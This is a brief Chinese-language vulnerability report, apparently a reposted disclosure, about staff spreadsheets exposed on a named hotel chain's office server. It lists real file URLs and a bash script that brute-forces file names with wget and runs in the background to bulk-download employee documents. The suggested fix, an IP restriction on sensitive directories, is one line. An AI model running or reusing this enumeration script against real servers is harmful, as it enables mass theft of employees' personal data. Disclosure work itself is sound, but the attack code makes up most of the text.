如家酒店敏感信息泄露
http://office.homeinns.com/staffinfo/SMDocument/Upload/2010-5-1317430.xls
http://office.homeinns.com/staffinfo/OCSDocument/Upload/2013-8-27162223.xlsx
都是可以下载的,那么我们可用用一种简单粗暴的方式来爆跑
#!/bin/bash
for((i=1;i<13;i++))
do
for((j=1000000;j<9999999;j++))
do
wget http://office.homeinns.com/staffinfo/SMDocument/Upload/2010-$i-$j.xls
done
done
nohup ./download.sh &
修复方案:
对于敏感目录,做ip限制。
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;